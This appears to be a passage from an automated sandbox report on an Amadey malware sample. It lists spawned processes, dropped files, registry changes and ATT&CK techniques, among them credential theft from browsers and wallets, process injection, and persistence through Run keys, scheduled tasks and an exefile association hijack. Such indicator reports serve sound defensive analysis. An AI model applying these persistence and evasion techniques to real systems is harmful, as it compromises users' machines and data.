amadey | 1dfb7d09daa0bece4197d998a72acac7deebaf2ff54b4461667495a41240d0e8

System Information Discovery

Processes:

lada.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lada.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lada.exe

Checks computer location settings 2 TTPs 26 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

stub.exestub.exestub.exestub.exestub.exe4363463463464363463463463.exeOpolis.exestub.exeInstallSetup.exefirst.exestub.exedusers.exestub.exeWScript.exeDctooux.exeRegAsm.exestub.execmd.execmd.exeLogs.exesvchost.com15C633~1.EXEstub.exeUsers.exe4363463463464363463463463.exebuild1234.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Opolis.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	InstallSetup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	first.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	dusers.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Dctooux.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Logs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	svchost.com
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	15C633~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	stub.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Users.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	build1234.exe

Executes dropped EXE 64 IoCs

Processes:

crypted.exenetwora.exepowershell.exeConhost.exeInstallSetup.exeu3ts.0.exesvchost1.exeConhost.exefind.exei.exefirst.exeu3ts.1.exeofg7d45fsdfgg312.exedusers.exeUsers.exewmild.exewmild.exeama.exeminuscrypt_crypted.exewmild.exewmild.exe4363463463464363463463463.exewmild.exewmild.exeDctooux.exe4363463463464363463463463.exebaseline.exealex.exebuild1234.exeolehps.exeLogs.exeMachinegggg.exeTrueCrypt_lXNcTC.exeWatchDog.exeqemu-ga.exeOpolis.exelada.exeXMRig.exe2-3-1_2023-12-14_13-35.exeuwgxswmtctao.exeOSM-Client.exestub.exesvchost.exestub.exesvchost.exestub.exesvchost.exestub.exesvchost.comsvchost.comsvchost.comsvchost.com15C633~1.EXEstub.exesvchost.comstub.exesvchost.comtel.exesvchost.comfcc.exesvchost.comjjj.exesvchost.comstub.exe

pid	process
4276	crypted.exe
2364	networa.exe
2224	powershell.exe
1332	Conhost.exe
4960	InstallSetup.exe
3968	u3ts.0.exe
1636	svchost1.exe
2948	Conhost.exe
3120	find.exe
4072	i.exe
2976	first.exe
3016	u3ts.1.exe
1356	ofg7d45fsdfgg312.exe
2876	dusers.exe
2648	Users.exe
244	wmild.exe
396	wmild.exe
1152	ama.exe
1692	minuscrypt_crypted.exe
2888	wmild.exe
1052	wmild.exe
5184	4363463463464363463463463.exe
5900	wmild.exe
5880	wmild.exe
4408	Dctooux.exe
5436	4363463463464363463463463.exe
1832	baseline.exe
1732	alex.exe
6108	build1234.exe
6036	olehps.exe
5584	Logs.exe
1592	Machinegggg.exe
2332	TrueCrypt_lXNcTC.exe
1676	WatchDog.exe
1680	qemu-ga.exe
5288	Opolis.exe
4980	lada.exe
4644	XMRig.exe
2644	2-3-1_2023-12-14_13-35.exe
5732	uwgxswmtctao.exe
3052	OSM-Client.exe
5788	stub.exe
5808	svchost.exe
1932	stub.exe
2004	svchost.exe
1016	stub.exe
380	svchost.exe
5448	stub.exe
5328	svchost.com
4280	svchost.com
2912	svchost.com
1652	svchost.com
5576	15C633~1.EXE
5900	stub.exe
3684	svchost.com
5376	stub.exe
3692	svchost.com
5168	tel.exe
2252	svchost.com
5968	fcc.exe
2784	svchost.com
3044	jjj.exe
1456	svchost.com
2628	stub.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

lada.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Wine lada.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Wine	lada.exe

Loads dropped DLL 60 IoCs

Processes:

ama.exerundll32.exerundll32.exerundll32.exeOSM-Client.exe

pid	process
1152	ama.exe
4488	rundll32.exe
6016	rundll32.exe
1796	rundll32.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe
3052	OSM-Client.exe

Modifies system executable filetype association 2 TTPs 1 IoCs
persistence

Modify Registry
T1112

Change Default File Association
T1546.001

Processes:

stub.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" stub.exe
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	stub.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral3/memory/2648-266-0x0000000000400000-0x0000000000442000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\Files\Users.exe	upx
C:\Users\Admin\AppData\Local\Temp\Files\Users.exe	upx
behavioral3/memory/2876-313-0x0000000000400000-0x0000000000440000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe	upx
behavioral3/memory/2876-229-0x0000000000400000-0x0000000000440000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe	upx
behavioral3/memory/2648-351-0x0000000000400000-0x0000000000442000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

build1234.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	build1234.exe
Key opened	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	build1234.exe
Key opened	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	build1234.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

first.exereg.exereg.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\first = "C:\\Users\\Admin\\AppData\\Roaming\\first.exe"	first.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winsvcr = "C:\\Users\\Admin\\AppData\\Roaming\\Macromedia\\svr.vbs"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\A_second_wind_for_important_cases = "C:\\Users\\Admin\\AppData\\Local\\A_second_wind_for_important_cases\\A_second_wind_for_important_cases.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

46 raw.githubusercontent.com
160 raw.githubusercontent.com
8 bitbucket.org
9 bitbucket.org
45 raw.githubusercontent.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

48 ip-api.com
157 ip-api.com

flow	ioc
46	raw.githubusercontent.com
160	raw.githubusercontent.com
8	bitbucket.org
9	bitbucket.org
45	raw.githubusercontent.com

flow	ioc
48	ip-api.com
157	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\networa.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

crypted.exelada.exe

pid process

4276 crypted.exe
4980 lada.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

minuscrypt_crypted.exeama.exealex.exeMachinegggg.exeTrueCrypt_lXNcTC.exeuwgxswmtctao.exetel.exejjj.exe

description	pid	process	target process
PID 1692 set thread context of 3132	1692	minuscrypt_crypted.exe	AppLaunch.exe
PID 1152 set thread context of 516	1152	ama.exe	RegSvcs.exe
PID 1732 set thread context of 1800	1732	alex.exe	RegAsm.exe
PID 1592 set thread context of 4920	1592	Machinegggg.exe	ADelRCP.exe
PID 2332 set thread context of 4260	2332	TrueCrypt_lXNcTC.exe	jsc.exe
PID 5732 set thread context of 1400	5732	uwgxswmtctao.exe	explorer.exe
PID 5168 set thread context of 5424	5168	tel.exe	vbc.exe
PID 3044 set thread context of 2612	3044	jjj.exe	vbc.exe

Drops file in Program Files directory 64 IoCs

Processes:

stub.exestub.exefind.exe

description	ioc	process
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~4.EXE	stub.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	stub.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\1f93f77a7f4778	find.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	stub.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe	stub.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI9C33~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wab.exe	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	stub.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\RCX9FD5.tmp	find.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	stub.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\logs\MOUSOC~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpshare.exe	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	stub.exe
File opened for modification	C:\Program Files\Uninstall Information\dwm.exe	find.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MI391D~1.EXE	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	stub.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	stub.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	stub.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	stub.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	stub.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\RCX9FD4.tmp	find.exe
File opened for modification	C:\Program Files\Windows Security\BrowserCore\RCX9B4D.tmp	find.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	stub.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	stub.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	stub.exe
File created	C:\Program Files (x86)\Windows Mail\networa.exe	find.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe	find.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{FB050~1\WINDOW~1.EXE	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	stub.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13181~1.5\MICROS~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	stub.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wab.exe	stub.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	stub.exe
File created	C:\Program Files\Uninstall Information\dwm.exe	find.exe
File opened for modification	C:\Program Files\Uninstall Information\RCX85EE.tmp	find.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	stub.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE	stub.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	stub.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	stub.exe

Drops file in Windows directory 57 IoCs

Processes:

stub.exesvchost.comstub.exesvchost.comstub.exesvchost.comsvchost.comstub.exesvchost.comsvchost.comstub.exeConhost.exefind.exestub.exesvchost.comstub.exesvchost.comsvchost.comsvchost.comstub.exesvchost.comsvchost.comsvchost.comsvchost.comstub.exestub.exestub.exestub.exestub.exe

description	ioc	process
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File created	C:\Windows\svchost.exe	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File created	C:\Windows\Tasks\Dctooux.job	Conhost.exe
File created	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe	find.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File created	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\ea9f0e6c9e2dcd	find.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\RCX8F2C.tmp	find.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe	find.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File created	C:\Windows\svchost.exe	stub.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\RCX8F2D.tmp	find.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	stub.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	stub.exe
File opened for modification	C:\Windows\svchost.com	stub.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1652 sc.exe
5576 sc.exe
5616 sc.exe
5972 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1652	sc.exe
5576	sc.exe
5616	sc.exe
5972	sc.exe

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2500	1332	WerFault.exe	NBYS%20AH.NET.exe
1692	4960	WerFault.exe	InstallSetup.exe
4272	1692	WerFault.exe	minuscrypt_crypted.exe
848	2644	WerFault.exe	2-3-1_2023-12-14_13-35.exe
5596	1676	WerFault.exe	WatchDog.exe
1804	5168	WerFault.exe	tel.exe
5972	3044	WerFault.exe	jjj.exe
2864	3968	WerFault.exe	u3ts.0.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

u3ts.0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u3ts.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u3ts.0.exe

Creates scheduled task(s) 1 TTPs 41 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

SCHTASKS.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1300	SCHTASKS.exe
2628	schtasks.exe
244	schtasks.exe
4252	schtasks.exe
464	schtasks.exe
4432	schtasks.exe
4868	schtasks.exe
1884	schtasks.exe
3168	schtasks.exe
3976	schtasks.exe
2484	schtasks.exe
3420	schtasks.exe
2628	schtasks.exe
2848	schtasks.exe
620	schtasks.exe
1092	schtasks.exe
1724	schtasks.exe
1544	schtasks.exe
3148	schtasks.exe
3132	schtasks.exe
3848	schtasks.exe
2380	schtasks.exe
4680	schtasks.exe
544	schtasks.exe
4092	schtasks.exe
5088	schtasks.exe
1724	schtasks.exe
844	schtasks.exe
3112	schtasks.exe
1304	schtasks.exe
2544	schtasks.exe
4636	schtasks.exe
1464	schtasks.exe
4272	schtasks.exe
3472	schtasks.exe
4248	schtasks.exe
3260	schtasks.exe
4800	schtasks.exe
2784	schtasks.exe
4464	schtasks.exe
2172	schtasks.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4364 timeout.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5836 taskkill.exe
1580 taskkill.exe
5300 taskkill.exe
3120 taskkill.exe
5804 taskkill.exe

pid	process
4364	timeout.exe

pid	process
5836	taskkill.exe
1580	taskkill.exe
5300	taskkill.exe
3120	taskkill.exe
5804	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies registry class 53 IoCs

Processes:

explorer.exefind.exesvchost.comstub.exestub.exestub.exestub.exe15C633~1.EXEcmd.exestub.exeOpolis.exestub.exestub.exestub.exe4363463463464363463463463.exestub.exepowershell.exestub.exe4363463463464363463463463.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
